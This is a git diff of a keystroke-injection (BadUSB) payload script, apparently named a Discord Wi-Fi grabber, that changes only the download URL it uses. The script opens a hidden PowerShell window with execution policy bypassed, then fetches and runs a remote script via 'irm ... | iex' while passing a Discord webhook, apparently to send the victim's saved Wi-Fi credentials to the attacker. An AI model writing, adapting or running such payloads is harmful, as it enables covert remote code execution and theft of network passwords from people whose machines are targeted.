diff --git a/Wifi-Networks-to-Discord/Discord-WiFi-Grabber.txt b/Wifi-Networks-to-Discord/Discord-WiFi-Grabber.txt index 23f74f2..52077b0 100644 --- a/Wifi-Networks-to-Discord/Discord-WiFi-Grabber.txt +++ b/Wifi-Networks-to-Discord/Discord-WiFi-Grabber.txt @@ -13,7 +13,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_wifi_to_dc | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://bw0.cc/dcwifi | iex ENTER